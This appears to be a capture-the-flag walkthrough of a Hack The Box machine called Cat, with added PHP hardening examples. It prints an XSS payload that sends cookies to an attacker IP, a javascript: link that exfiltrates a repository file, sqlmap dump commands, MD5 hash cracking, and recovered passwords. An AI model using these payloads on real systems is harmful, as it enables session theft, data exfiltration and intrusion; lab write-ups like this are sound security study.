Recon:

Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-02 00:35 IST
Nmap scan report for 10.10.11.53 (10.10.11.53)
Host is up (0.42s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 96:2d:f5:c6:f6:9f:59:60:e5:65:85:ab:49:e4:76:14 (RSA)
|   256 9e:c4:a4:40:e9:da:cc:62:d1:d6:5a:2f:9e:7b:d4:aa (ECDSA)
|_  256 6e:22:2a:6a:6d:eb:de:19:b7:16:97:c2:7e:89:29:d5 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Did not follow redirect to http://cat.htb/
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
 
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 56.76 seconds

Enumeration:

  • There are 5 pages we can see; register and log in.
  • admin:admin got access, and we get a page to upload an image file.
  • checking whether it filters the file or not; this could be the way to user.
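Added example, not the box's upload handler: the server-side checks an image upload form like the one behind admin:admin would need so that the filter cannot be bypassed by the client-chosen name or Content-Type. The upload directory, field name and size limit are assumptions for illustration.

```php
<?php
// Added example, not the box's upload handler: server-side validation for an
// image upload form such as the one behind admin:admin. The upload directory,
// field name and size limit are assumptions for illustration.
const UPLOAD_DIR = '/var/www/uploads_noexec'; // assumed: outside the web root, script execution disabled
const MAX_BYTES  = 2 * 1024 * 1024;

function store_image(array $file): ?string {
    // Reject transport errors and oversized bodies before reading the file.
    if ($file['error'] !== UPLOAD_ERR_OK || $file['size'] > MAX_BYTES) {
        return null;
    }
    // The client-supplied name and type are attacker-controlled; sniff the
    // real content instead of trusting the extension or Content-Type.
    $finfo   = new finfo(FILEINFO_MIME_TYPE);
    $mime    = $finfo->file($file['tmp_name']);
    $allowed = ['image/png' => 'png', 'image/jpeg' => 'jpg', 'image/gif' => 'gif'];
    if (!isset($allowed[$mime])) {
        return null;
    }
    // Require a decodable image, not just a matching magic number.
    if (getimagesize($file['tmp_name']) === false) {
        return null;
    }
    // Name the file server-side and derive the extension from the sniffed type,
    // so nothing the client chose reaches the filesystem.
    $name = bin2hex(random_bytes(16)) . '.' . $allowed[$mime];
    if (!move_uploaded_file($file['tmp_name'], UPLOAD_DIR . '/' . $name)) {
        return null;
    }
    return $name;
}

if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['image'])) {
    $stored = store_image($_FILES['image']);
    http_response_code($stored === null ? 400 : 201);
    echo $stored === null ? 'upload rejected' : 'stored as ' . htmlspecialchars($stored);
}
```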

  • used git dump and got the source, and found XSS, SQLi and CSRF vulnerabilities.
 #port 80
 <img src=x onerror=this.src="http://10.10.16.51/"+btoa(document.cookie)>
  • started a Python server on port 80 and listened to get the admin cookie.

  • now we have the admin cookie; next, I noticed accept_cat.php in the source code we dumped.
sqlmap -u "http://cat.htb/accept_cat.php" --data "catId=1&catName=normal" --cookie="PHPSESSID=61c0u782gl2ihhlarqjgl1n62s" -p catName --level=5 --risk=3 --dbms=SQLite --dump

  • have to do it quickly, otherwise we get a new cookie.
sqlmap -u "http://cat.htb/accept_cat.php" --data "catId=1&catName=normal" --cookie="PHPSESSID=upobbgr3j8qlofomit1v37gmfv" -p catName --level=5 --risk=3 --dbms=SQLite --dump -T users -C username,password --threads=10

  • axel's hash is not crackable, but we got a user rosa with an MD5 hash.
john rosa --format=raw-md5 --wordlist=~/Downloads/rockyou.txt
soyunaprincesarosa
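Added example, not the box's accept_cat.php or login code, serving both the catName injection above and the raw-MD5 hashes cracked with john: the update done with bound parameters, and password storage with password_hash(). Table and column names (users: username, password) follow the dump; the cats table and every sample value are constructed here.

```php
<?php
// Added example, not the box's accept_cat.php or login code: the catName
// lookup done with bound parameters, and password storage that is not a raw
// MD5. Table and column names (users: username, password) follow the dump;
// the cats table and all sample data are constructed here.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT NOT NULL)');
$db->exec('CREATE TABLE cats (cat_id INTEGER PRIMARY KEY, cat_name TEXT NOT NULL, accepted INTEGER NOT NULL DEFAULT 0)');
$db->exec("INSERT INTO cats (cat_id, cat_name) VALUES (1, 'normal'), (2, 'O''Malley')");

// The injectable shape is string interpolation into the SQL text, e.g.
//   "UPDATE cats SET accepted = 1 WHERE cat_name = '$catName'"
// With a prepared statement the value travels separately from the SQL, so a
// quote in catName is just a quote.
function accept_cat(PDO $db, int $catId, string $catName): int {
    $stmt = $db->prepare('UPDATE cats SET accepted = 1 WHERE cat_id = :id AND cat_name = :name');
    $stmt->execute([':id' => $catId, ':name' => $catName]);
    return $stmt->rowCount(); // 1 if the cat matched, 0 otherwise
}

// password_hash() produces a salted bcrypt hash by default; the algorithm,
// cost and salt are embedded in the stored string, so a wordlist run against
// the users table costs far more per guess than raw MD5 did for rosa.
function register_user(PDO $db, string $username, string $plain): void {
    $stmt = $db->prepare('INSERT INTO users (username, password) VALUES (:u, :p)');
    $stmt->execute([':u' => $username, ':p' => password_hash($plain, PASSWORD_DEFAULT)]);
}

function check_login(PDO $db, string $username, string $plain): bool {
    $stmt = $db->prepare('SELECT password FROM users WHERE username = :u');
    $stmt->execute([':u' => $username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row !== false && password_verify($plain, $row['password']);
}

// Constructed demo values (not the box's credentials).
register_user($db, 'rosa', 'example-only-password');
var_dump(accept_cat($db, 2, "O'Malley"));    // the apostrophe is handled as data
var_dump(accept_cat($db, 1, 'nonexistent')); // no cat with that literal name
var_dump(check_login($db, 'rosa', 'example-only-password'));
var_dump(check_login($db, 'rosa', 'wrong-password'));
```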
  • we don't get any user flag; axel has it. Checking ports and forwarding them.

  • we have Gitea.

grep -iR "axel" /var/log

aNdZwgC4tI9gnVXv_e3Q
  • with this we can log in to Gitea (logging in as rosa did not work) and also SSH as axel and get the user flag.
find / -type f -name "*.db" 2>/dev/null

  • cat.db has the users, the same ones we dumped with SQL injection.
  • now with the exploit, as Gitea is vulnerable to XSS, following the instructions from the exploit:
From rosa@cat.htb  Sat Sep 28 04:51:50 2024
Return-Path: <rosa@cat.htb>
Received: from cat.htb (localhost [127.0.0.1])
        by cat.htb (8.15.2/8.15.2/Debian-18) with ESMTP id 48S4pnXk001592
        for <axel@cat.htb>; Sat, 28 Sep 2024 04:51:50 GMT
Received: (from rosa@localhost)
        by cat.htb (8.15.2/8.15.2/Submit) id 48S4pnlT001591
        for axel@localhost; Sat, 28 Sep 2024 04:51:49 GMT
Date: Sat, 28 Sep 2024 04:51:49 GMT
From: rosa@cat.htb
Message-Id: <202409280451.48S4pnlT001591@cat.htb>
Subject: New cat services
 
Hi Axel,
 
We are planning to launch new cat-related web services, including a cat care website and other projects. Please send an email to jobert@localhost with information about your Gitea repository. Jobert will check if it is a promising service that we can develop.
 
Important note: Be sure to include a clear description of the idea so that I can understand it properly. I will review the whole repository.
 
From rosa@cat.htb  Sat Sep 28 05:05:28 2024
Return-Path: <rosa@cat.htb>
Received: from cat.htb (localhost [127.0.0.1])
        by cat.htb (8.15.2/8.15.2/Debian-18) with ESMTP id 48S55SRY002268
        for <axel@cat.htb>; Sat, 28 Sep 2024 05:05:28 GMT
Received: (from rosa@localhost)
        by cat.htb (8.15.2/8.15.2/Submit) id 48S55Sm0002267
        for axel@localhost; Sat, 28 Sep 2024 05:05:28 GMT
Date: Sat, 28 Sep 2024 05:05:28 GMT
From: rosa@cat.htb
Message-Id: <202409280505.48S55Sm0002267@cat.htb>
Subject: Employee management
 
We are currently developing an employee management system. Each sector administrator will be assigned a specific role, while each employee will be able to consult their assigned tasks. The project is still under development and is hosted in our private Gitea. You can visit the repository at: http://localhost:3000/administrator/Employee-management/. In addition, you can consult the README file, highlighting updates and other important details, at: http://localhost:3000/administrator/Employee-management/raw/branch/main/README.md.

ROOT

1. create a new repo
2. the description contains the payload
<a href="javascript:fetch('http://localhost:3000/administrator/Employee-management/raw/branch/main/index.php').then(response => response.text()).then(data => fetch('http://10.10.14.xxx:8000/?response=' + encodeURIComponent(data))).catch(error => console.error('Error:', error));">XSS test</a>
3. create a new file in the same repo and commit the changes
4. send mail to jobert using curl or swaks
5. before that, run the Python server with the port set in the payload

swaks --to "jobert@localhost" --from "axel@localhost" --header "Subject: click link" --body "http://localhost:3000/axel/xss" --server localhost --port 25 --timeout 30s
  • here xss is the repo name.

  • URL-decoded it and we got another password.
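Added example, not code from the box, Gitea or the writeup, covering both the cookie-stealing onerror payload on port 80 and the javascript: link in the Gitea description: the application-side changes that break each step of that chain. Function names are mine, and HTTPS is assumed for the Secure cookie flag.

```php
<?php
// Added example, not code from the box, Gitea or the writeup: application-side
// hardening against the two XSS vectors above, an onerror handler in stored
// content and a javascript: link target in a description, plus the session
// cookie flags that keep document.cookie from exposing PHPSESSID.
// Function names are mine; HTTPS is assumed for the Secure flag.

// 1. Session cookie: HttpOnly hides it from script even if an XSS fires,
//    SameSite=Lax blunts the CSRF found in the dumped source.
session_set_cookie_params([
    'httponly' => true,
    'samesite' => 'Lax',
    'secure'   => true,
    'path'     => '/',
]);
session_start();

// 2. Output encoding: user text is emitted as text, never parsed as markup.
function render_text(string $untrusted): string {
    return htmlspecialchars($untrusted, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// 3. User-supplied link targets: only absolute http(s) URLs become an href.
function safe_href(string $untrusted): ?string {
    $url   = trim($untrusted);
    $parts = parse_url($url);
    if ($parts === false || empty($parts['scheme']) || empty($parts['host'])) {
        return null;
    }
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return null;
    }
    return htmlspecialchars($url, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_link(string $label, string $target): string {
    $href = safe_href($target);
    if ($href === null) {
        return render_text($label); // rejected target: show the label, no link
    }
    return '<a href="' . $href . '" rel="noopener noreferrer">' . render_text($label) . '</a>';
}

// Constructed inputs in the shape of the two payloads above.
echo render_text('<img src=x onerror=1>'), "\n";
echo render_link('repo', 'http://localhost:3000/administrator/Employee-management/'), "\n";
echo render_link('XSS test', 'javascript:fetch("http://localhost:3000/")'), "\n";
```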